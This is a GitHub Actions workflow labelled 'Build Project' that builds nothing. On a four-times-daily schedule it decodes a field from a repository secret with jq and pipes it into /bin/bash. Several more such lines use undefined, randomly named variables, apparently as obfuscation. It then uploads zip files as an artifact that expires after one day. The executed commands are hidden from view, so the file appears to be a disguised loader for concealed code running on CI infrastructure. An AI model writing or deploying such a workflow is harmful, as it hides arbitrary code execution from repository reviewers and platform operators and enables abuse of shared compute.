name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '9 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  action:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Begin
        env:
          c65: ${{ secrets.c65 }}
        run: |
          printf '%s' "$c65" | jq -r .mt59 | /bin/bash
          echo $u47442 | jq -r .zvmod9 | /bin/bash
          echo $ln7910 | jq -r .cxae48970 | /bin/bash
          echo $cvt24902 | jq -r .vewd0 | /bin/bash
          printf '%s' "$njj3" | jq -r .taai9 | /bin/bash
          printf '%s' "$li04" | jq -r .mx2881 | /bin/bash
          echo $tp5129 | jq -r .mx8 | /bin/bash
          printf '%s' "$uvoty9" | jq -r .r6 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: CtNf6djI
          path: "*.zip"
          retention-days: 1
